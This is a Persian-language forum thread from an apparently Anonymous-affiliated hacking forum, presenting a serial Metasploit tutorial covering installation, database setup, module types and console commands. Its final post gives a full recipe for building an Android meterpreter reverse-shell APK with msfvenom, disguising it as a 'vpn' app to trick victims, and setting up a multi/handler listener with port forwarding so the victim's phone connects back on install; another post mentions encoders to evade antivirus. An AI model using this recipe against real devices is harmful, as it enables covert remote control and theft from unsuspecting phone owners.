پرش به


تصویر
  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
8 پاسخ برای این موضوع

#1 ارسالی 12 ژوئیه 2017 - 10:17

Wolf Moon
+1,022
    OFFLINE
    تاریخ عضویت :
    28 مه 2016
  • Anonymous
  • VIP
  • 290 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : ‌ ‍ ‌‌‌‌ ‌‌‌‌ ‌

*
پست محبوب

بنام خداوند افریننده هستی

 

سلام خدمت تمامی اعضای انجمن هکران ناشناس ایران

خوب تصمیم گرفتم یه آموزش کامل و مرجع برای کسانی که علاقه به Hack و امنیت دارند باز کنم و تنها یک قطره از این دنیای ناپایان رو شرح بدم.

در این آموزش یاد میگیریم با متااسپلویت چطوری کار کنیم بهینه تصمیم بگیرم و حمله موفقی داشته باشیم.

خوب تاپیک سنگین هست و سعی میکنم هر شب یا یک روز در میان یک پست قرار بدم.

اگه استقبال خوبی نشه ادامه نمیدم .

برای جلو گیری از اسپم و بهم نخوردن نظم بعد از چند جلسه یک تاپیک جدا برای پرسش و پاسخ باز میکنم بس اسپم نکنید.



#2 ارسالی 13 ژوئیه 2017 - 10:37

Wolf Moon
+1,022
    OFFLINE
    تاریخ عضویت :
    28 مه 2016
  • Anonymous
  • VIP
  • 290 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : ‌ ‍ ‌‌‌‌ ‌‌‌‌ ‌

*
پست محبوب

جلسه اول:آموزش نصب

سلام.در این جلسه آموزش نصب متااسپلویت رو میگم. چنیدن راه برای نصب وجود داره که من ساده ترین راه نصب رو میگم.

روی اکثر توزیع های گنو/لینوکسی که برای تست نفوذ ساخته شدن این ابزرا بصورت پیش فرض نصب هست (مثل:کالی-بلک آرچ-پاروت) ما توی این آموزش در توزیع اوبونتو کار میکنیم. ساده ترین وسریع ترین راه رو بهتون میگم.

 

ابتدا سورس لیست کالی رو از ادرس زیر بگیرید.

https://docs.kali.org/general-use/kali-linux-sources-list-repositories

حالا باید سورس لیست رو به مخازن اوبونتو اضافه کنیم .دستور زیر رو توی ترمینال بزنید و سورس لیستی که از سایت کالی گرفتیم رو به اخر فایل اضافه کنید و ذخیره کنید

gedit /etc/apt/sources.list

خوب حا باید مخازن رو آپدیت کنیم :

sudo apt-get upadate

ازتون پسورد میخواد و پسورد یوزر روت رو باید بزنید . حال باید متااسپلویت رو نصب کنیم با دستور زیر:

sudo apt-get install ‫‪metasploit‬‬

 بعد ازتون مجوز نصب میخواد که شما yes (y) جواب بدید.

 

بعد نصب برای اجرا هم کافیه یا از طریق برنامه ها سرچ کنید یا هم توی ترمینال بزنید sudo metasploit تا براتون اجرا بشه.

 

موفق باشید.



#3 ارسالی 17 ژوئیه 2017 - 11:11

Wolf Moon
+1,022
    OFFLINE
    تاریخ عضویت :
    28 مه 2016
  • Anonymous
  • VIP
  • 290 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : ‌ ‍ ‌‌‌‌ ‌‌‌‌ ‌

*
پست محبوب

جلسه دوم: ساخت دیتابیس و حل مشکلات

سلام خدمت دوستان عزیز خوب توی این قسمت با ساخت دیتابیس و برخی از مشکلات میریم جلو.

اول اینکه متااسپلویت پایگاه داده ای از نوع postgresql استفاده میکنه اما این که چرا باید این کار رو انجام بدیدم یکی از دلایل جستجوی سریع هستش خوب دیه توضیح نمیدم بریم سراغ کار

=======================

ابتدا ترمینال رو باز کنید و با دستور زیر سرویس postgresql رو ران کنید:

sudo service postgresql start

حال باید متااسپلویت رو اجرا کنید بعد از اجرا این دستور رو اجرا کنید اگر در پاسخ گفت اگه به دیتابیس وصل هست(معمولا با نام های شبیه به msf3 , msf و ..)

db_status

نیاز نیست مراحل زیر رو انجام بدید و اما اگر با خطای عدم اتصال به دیتابیس برخوردید ادامه کار رو انجام بدید.

خوب ابتدا ترمینال جدیدی باز کنید و دستور زیر رو اجرا کنید:

sudo msfdb init

صبر کنید تا مراحل تکمیل شود سپس از ترمینال جدید که باز کرده بودیم خارج شوید و متااسپلویت رو هم ببندید و دوباره اجرا کنید. سپس دستور زیر رو داخل کنسول متااسپلویت اجرا کنید:

db_rebuild_cache‬‬

حال دوباره دستور db_status رو اجرا کنید که میبینید به دیتابیس به خوبی وصل شده.

نکته:برای اینکه هر بار نخواییم وقتی که متااسپلویت رو اجرا میکنیم سرویس postgresql رو اجرا نکنیم کافیه دستور زیر رو بعد اجرای سرویس postgresql اجراش کنیم توی ترمینال

update-rc.d‬‬ ‫‪postgresql‬‬ ‫‪enable

خوب خوب اینم از این جلسه امیدوارم مفید بوده باشه و پسند هم فراموش نشه من توی هیچ سایتی ندیدم چنین تاپیکی باز بشه و با این متد جلو بره .



#4 ارسالی 18 ژوئیه 2017 - 12:10

    OFFLINE
    تاریخ عضویت :
    25 اوت 2016
  • %30███▒▒▒▒▒▒▒
  • VIP
  • 31 ارسال
    Last Visit 4 هفته قبل
  • Country :
  • Gender : Male
  • Location : anywhere
  • Name : /\/\/\/

*
پست محبوب

جلسه سوم: معرفی رابط های کاربری و محتوا

 

رابط های کاربری مختلفی برای ارتباط با metasploit وجود داره . ولی در کل کاربردی ترین اون ها یکی msfconole هست که یک رابط کنسولی تعاملی هست و در بیشتر وظایف کاربرد داره و رایج ترین رابط کاربری متا اسپلویت هست و دومی هم رابط گرافیکی Armitage هست که بیشتر برای حملات محلی (درون شبکه) و برای حمله به تعداد زیادی قربانی به کار گرفته میشه.

 

اما در مورد محتوای metasploit:

 

• Exploits: قطعه کد هایی هستند که آسیب پذیری خاصی را هدف قرار می دهند. و تقریبا اصلی ترین محتوای metasploit همین ها هستند. نوع active اون  یک هدف مشخص رو مورد بهره برداری قرار میده ، اجرا می شه  تا وقتی که به پایان برسد، وبعدش خروج (مثل یک سرریز بافر). نوع passive اون منتظرincoming hosts مثل مرورگرهای وب یا مشتریان FTP میمونن و وقتی با اونا متصل شدن ازشون سوء استفاده میکنن.
 
• Payloads: این ها کدای مخربی هستن که برای پیاده سازی دستورات بلافاصله بعد از یک اکسپلویت موفق به کار گرفته میشن. جایی کاربرد دارن که اکسپلویت یک ا کسپلویت ریموت باشه نه محلی. در کل میشه گفت مکمل اکسپلویتا هستن
 
• Auxiliary modules: این ماژول ها مستقیما ارتباطی بین حمله کننده و قربانی ایجاد نمیکنن در عوض اون ها کارایی مثل اسکن کردن،فازینگ و یا استراق سمع روانجام میدون و برای مرحله exploition یه نوع پشتیبان به حساب میان. مثل گروه شناسایی که قبل از عملیات تو جنگ میفرستن:D
 
• Post modules: بعد از یه exploit موفق این ماژول ها به ما کمک میکنن تا اولا اطلاعات مفیدی رو جمع آوری کنیم و دوما در مواردی که دسترسی ما به هر دلیلی محدود باشه میتونه دسترسی ما رو عمیق تر کنه .
 
• Encoders: وقتی که با گذر از آنتی ویروس سر و کار داریم با استفاده از رمزگزاری توسط Encoder ها میتونیم جلوی تکنیک تطابق امضای الکترونیکی و در نتیجه شناسایی توسز آنتی ویروس رو بگیریم.
 
• (No operations (NOPs: اینها برای ترویج سرریز بافر استفاده میشن . ولی من به شخصه تا حالا هیچ استفاده ای از این قسمت نداشتم:|
 
موفق باشید.

.Knowledge is Free

.We Are Anonymous

.We Are Legion

.We Do Not Forgive

.We Do Not Forget

.Expect Us


#5 ارسالی 21 ژوئیه 2017 - 10:45

Wolf Moon
+1,022
    OFFLINE
    تاریخ عضویت :
    28 مه 2016
  • Anonymous
  • VIP
  • 290 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : ‌ ‍ ‌‌‌‌ ‌‌‌‌ ‌

جلسه چهارم: دستور search و use




سلام خدمت تمامی دوستان عزیز خوب شرمنده بابت تاخیر. چون آخر شب ها فقط خونه هستم و به سیستم دسترسی دارم نمیشه زود زود پست گذاشت. خوب دیه بریم سر اصل مطلب امروز قرار عملی وارد بازی بشیم :D

دستور search برای سرچ کردن استفاده میشه و از اسمشم معلوم هست . نحوی استفاده هم به این شکل هست ابتدا کنسول متااسپلویت رو باز کنید و دستور رو وارد کنید برای مثال من میخوام راجب FTP ببینم چی هست :

search ftp

خوب فرض مثال من یه اکسپلویت راجب اف تی پی با سرچ کردن توی دیتابیس متاسپلویت پیدا کردم با اسم ftp-version (مثال زدم) حالا برای استفاده از این باید اون رو انتخاب کنیم یا به زبون ساده بهش بگیم که الان من میخوام با این کار کنم اینو برام بیار بالا :) خوب اینجاس که پای دستور use باز میشه :| برای استفاده :
 

use ftp-version

اینطوری عمل کنید.

خوب خوب اینم از اینا و تشکر میکنم ازRed_w@rn!ng که قرار شده به بنده توی تاپیک کمک کنند تا بتونیم به بهترین شکل تا به پایان برسونیم.


موفق باشید یاحق.



#6 ارسالی 22 ژوئیه 2017 - 07:09

    OFFLINE
    تاریخ عضویت :
    25 اوت 2016
  • %30███▒▒▒▒▒▒▒
  • VIP
  • 31 ارسال
    Last Visit 4 هفته قبل
  • Country :
  • Gender : Male
  • Location : anywhere
  • Name : /\/\/\/

جلسه پنجم: ادامه دستور search و use

 

خب با تشکر از توضیحات کامل Wolf Moon عزیز یه سری مطالب تکمیل هم در مورد این دستورات به نظرم رسید که باید گفته بشه.

 =================================================================

خب در مورد دستور search یه سری آپشنا هست که با زدن 

search -h

که در واقع help سرچ متااسپلویت هست نشون داده میشه به شکل زیر 

iranonymous.org_1500733553__17-07-22_18-

خب در این جا همون طور که خود help همثال زده با ف/ی/ل/ترای مختلفی میتونیم به جست و جو بپردازیم که در اینجا سعی میکنم توضیحات مختصری در مورد هر کدوم بدم :

app --> با این ف/ی/ل/تر میتونیم clinet side یا server side بودن اکسپلویت یا اگزیلاری یا هر چیز دیگه ای که دنبالشیم رو مشخص کنیم.

author --> در این قسمت با نام نویسنده اکسپلویت میتونیم جست و جو مون رو ف/ی/ل/تر کنیم

bid,cve,edb--> مثلا وقتی که آیدی یه اکسپلویت رو از مخزن اکسپلویت سایت هایی مثل https://www.exploit-db.com یا http://www.cvedetails.com داشته باشیم و بخوایم با اون جست و جو کنیم البته bugtraq id رو من نفهمیدم منظورش چی بوده دقیقا چون یه سیستم عامل تست نفوذ هم به این اسم داریم .

name--> این که از اسمش مشخصه اگه با اسم اکسپلویت بخوایم سرچ کنیم کنیم از این ف/ی/ل/تر استفاده میکنیم

platforn--> مثلا میخوایم مشخص کنیم اکسپلویت رو چه پلتفرم هایی تاثیر میزاره . منظور از پلت فرم لینوکس یا ویندوز یا آندروید یا ios یا مک یا هر چیز دیگه ای هست.

ref--> ترجمه خود این کلمه که میشه مرجع حالا منظور از ف/ی/ل/تر کردن دیتابیس بر اساس یه مرجع نمیفههم باز دقیقا منظورش چی بوده این قسمت

type--> این قسمتم دیگه کاملا مشخصه شما میخواید نوع چیزی که میخواید سرچ کنید چی باشه اگزیلاری باشه اکسپلویت باشه یا هر چیز دیگه ای که وجود داره در کل یکی از همین دوتاسو

 

در مورد مثال آخر تصویر هم دستوری که میاد تمام اکسپلویت های  کلاینت محور رو در سال 2009 نشون میده

 

خب حالا ما اکسپلویتی که در زمان خودش غوغا به پا کرد و البته هنوزم حدودا میشه گفت کارایی داره رو سرچ میکنیم

iranonymous.org_1500734885__17-07-22_19-

 خب همون طور که میبینید توی مخزن متااسپلویت من یه دونه اکسپلویت از نوع stagefright وجود داره که رنکش هم نرمال هست ولی خب در مواقعی استفاده خودشو داره خب حالا با دستور 

use exploit/android/browser/stagefright+mp4_tx3g_64bit

اکسپلویت رو به کار میگیرم. بعد از به کار گیری اکسپلویت با دستور

show info

تمام اطلاعات در مورد اکسپلویت رو به دست میاریم . این اطلاعات شامل نویشنده اکسپلویت ، رنک ، زمان انتشار ، پلتفرم ، قربانی های که تاثیر میپذیرن از این اکسپلویت ، آپشن هایی که ما برای به کار گیری اکسپلویت باید اونو تنظیم کنیم (در جلسات بعدی این قسمت به طور کامل توضیح داده میشه) ، شرح مختصری از خود اکسپلویت و کاری که انجام میده و نحوه انجام کار به صورت کلی و در نهایت هم مراجعی که در مورد این اکسپلویتمیتونیم به اون ها مراجعه کنیم .

iranonymous.org_1500737798__17-07-22_19-

iranonymous.org_1500737873__17-07-22_19-


ویرایش شده توسط Red_w@rn!ng 22 ژوئیه 2017 - 07:14 .

.Knowledge is Free

.We Are Anonymous

.We Are Legion

.We Do Not Forgive

.We Do Not Forget

.Expect Us


#7 ارسالی 04 اوت 2017 - 01:41

Wolf Moon
+1,022
    OFFLINE
    تاریخ عضویت :
    28 مه 2016
  • Anonymous
  • VIP
  • 290 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : ‌ ‍ ‌‌‌‌ ‌‌‌‌ ‌

سلام :|

شرمنده بابت دیر پست گذاشتن اصلا وقت نمیکنم سر سیستم بشینم شما هم با پسند هاتون واقعا روحیه میدید =))

 

یه ویدیو از ترمینالم گرفتم آموزش کار با دستوراتی که تا الان گفته شده از لینک زیر میتونید ببنید.

https://asciinema.org/a/YYQ89n4qXK6Cz7e7GAeOMLvoa

 اونطوری که میخواستم نشد ولی خوب ...

موفق باشید. :-* :-


ویرایش شده توسط Wolf Moon 04 اوت 2017 - 01:43 .


#8 ارسالی 15 اوت 2017 - 11:04

Wolf Moon
+1,022
    OFFLINE
    تاریخ عضویت :
    28 مه 2016
  • Anonymous
  • VIP
  • 290 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : ‌ ‍ ‌‌‌‌ ‌‌‌‌ ‌

جلسه ششم: دستورات show options و set

بنام خدا

سلام خدمت تمامی دوستان عزیز

خوب باز شروع نکنم که وقت ندارم و این حرفا بهتره سریع شروع کنیم خوب امروز هم با این دوتا دستور آشنا میشیم

ابتدا توضیح میدم سپس یه عکس از محیط ترمینالم میزارم ببنید.

دستور show options همون طوری که از اسمش معلومه برای مشاهده آپشن های اکسپلویت ها هست اگه بخوام ساده تر توضیح بدم برای دوستان یعنی مقدار های که ما نیاز داریم تغیر بدیم تا اکسپلویت رو به سود خودمون کنترلش کنیم. به عنوان مثال

iranonymous.org_1502824974__show.png

اکسپلویتی که برای تست و نفوذ گوشی های اندرویدی استفاده میشه هست و با دستور show options مشخصاتی که براش باید معرفی کنیم نشون میده و اما گفتم براش معرفی کنیم اینجاس که پای دستور set وسط میاد از این دستور برای تغیر مقادیر استفاده میکنیم به عکس زیر توجه کنید .

iranonymous.org_1502825441__set.png

میبینید که مقدار اولیه تغیر کرده و چیزی که ما دادیم رو جایگزین کرده هست.

اینم دستورات این جلسه و موفق و همیشه پیروز باشید.



#9 ارسالی 16 اوت 2017 - 04:48

    OFFLINE
    تاریخ عضویت :
    25 اوت 2016
  • %30███▒▒▒▒▒▒▒
  • VIP
  • 31 ارسال
    Last Visit 4 هفته قبل
  • Country :
  • Gender : Male
  • Location : anywhere
  • Name : /\/\/\/

جلسه هفتم : یک مثال پرکاربرد به همراه توضیحات تکمیلی

خب دوستان یه مدت نبودم سرم خیلی شلوغ بود شرمنده که دیر شد.

حالا میریم سراغ payload معروف آندروید و نحوه ست کردنش در شبکه wan

خب اولین کاری که باید انجام بدید اینه که چون آی پی شما valid یا اصطلاحا static نیست شما نمیتونید آی پی عمومیتون رو فراخوانی کنید و اگر همین جوری فایل رو به قربانی بدید عملا هیچ کانکشنی ایجاد نمیشه. خب برا حل این مشکل شما اول باید به سسایت معروف no ip برید و اونجا یه حساب بسازید و یه دامنه رایگان بگیرید و اونو با آی پی تون توسط نرم افزار خود no ip سینک کنید (این قسمت خیلی راحته خود سایت آموزشش رو داره و تو گوگل هم یه سرچ یزنید هست بازم اگه مشکلی داشتید تو پ خ بگید)

خب بعد از سینک شدن آی پی عمومیتون دامنه که با آی پیتون ست شده رو یه جا کپی کنید یا بنویسید چون لازمه.

خب بعد از باز کردن کنسول متا اسپلویت با این دستور ساده یک پیلود بدون هیچ نو encode کردنی میسازیم . البته شما خودتون میتونید اونو encode کنید ولی کمتر پیش میاد که کاربرای آندروید یه آنتی ویروس به درد بخور داشته باشن که نیازی به این کار باشه

msfvenom -p android/meterpreter/reverse_tcp LHOST=your_public_ip LPORT=4895 R >/root/FILENAME.apk

قسمت بعد از p هم که نوع payloadرو مشخص میکنهکه در اینجا ما مشخصه که دیگه میخوایم از چه payload استفاده کنیم

خب به جای filename هم میتونید اسم دلخواه برا قایل بزارید مثلا بزارید vpn (این دیگه بستگی به مهندسی اجتماعی خودتون برا تزریق فایل به قربانی داره من که یه مهندسی اجتماعی خیلی سطح پایینی استفاده کردم آخه حجم فایل 10 کیلو بایته اونم vpn یکم عجیبه :)) )

قسمت بعد از R هم مسیر ذخیر فیل رو میگه به برنامه که در اینجا در شاخه اصلی یعنی همون root ذخیره میشه ولی خب میتونید به دلخواد تغییرش بدید.

در مورد port هم این پرت توی خود کد جواب میده هم پورت 4444 یا پورتای دیگه که مورد استفاده نباشه میتونید خودتون تست کنید

اما در مورد your_public_ip خب دیگه واضحه آی پی عمومی شما نه آیپی محلی تو شبکه محلی با هم اشتباه نگیرید برا به دست آوردنشم کافی مرورگرو باز کنید بزنید my ip ولی ما که valid نیست :Dپس کاری که میکنیم اینجا باید آدرس همون دامنه ای که با آی پی مون سینک شده رو وارد کنیم (گفتم یه جا کپی کنید لازم میشه برا اینجا بود) :)

خب بعد از این که payload ساخته شد باید بریم exploit رو ست کنیم که در اینجا از اکسپلویت multi handler که توانایی به کارگیری طیف وسیعی ازpayload ها رو داره و بسیار پرکاربرد هم هست استفاده میکنیم

خب دستورات زیر رو در کنسول وارد میکنیم

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST your_local_ip
set LPORT 4895

خب دقت کنید که در اینجا your_local_ip همون آدرس ip محلی شما هست که با باز کردن یه ترمینال جدید و دستور ifconfig میتونید اون پیدا کنید. و دقت کنید همون پورتی رو که به payload دادید همونم اینجا وارد کنید.

یه نکته که نباید فراموش بشه که شما باید توی تنظیمات مودم حتما portforwarding رو انجام بدید و آی پی محلی مربوط به سیستم عامل کالی که بالا گفتم چجوری به دست میاد رو با پورتی که استفاده کردید فروراد کنید.

پ.ن: در بعضی از isp ها بعضی از پورت ها به صورت پیش فرض بسته هست مثلا فک کنم تو ایران تقریبا همه isp ها پورت 80 که مربوط به سرویس وب هست رو بستن. در مورد این که ببینید پورتی که میخواید باز هست یا بسته میتونید اول پورت رو توی مودم فروراد کنید بعد با یه نرم افزار مثل listen.exe اونو در حالت listening قرار بدید و بعد با چک کردن پورت روی سایتی مثل http://canyouseeme.org متوجه باز یا بسته بودن پورت میشید.(بازم اگه سوالی بود پ خ بدید)

خب در نهایت با دستور exploit و ارسال فایل به قربانی به محض نصب کردن اون توسط قربانی کانکشن براتون ایجاد میشه.

در آموزش بعدی سعی میکنم دستورات و مراحل بعد از ایجاد کانکشن رو توضیح بدم.

با تشکر از دوست خوبم Wolf Moon


ویرایش شده توسط Red_w@rn!ng 16 اوت 2017 - 04:53 .

.Knowledge is Free

.We Are Anonymous

.We Are Legion

.We Do Not Forgive

.We Do Not Forget

.Expect Us






همچنین به بسیار مهم, Metasploit, تایپیک جامع آموزش Metasploit, آموزش متاسپلویت برای مبتدی ها, آموزش متااسپلویت, آموزش ۰ تا ۱۰۰ متااسپلویت, آموزش متااسپلویت حرفه ای, کالی لینوکس, متااسپلویت, هک با متااسپلویت نیز برچسب خورده است

0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP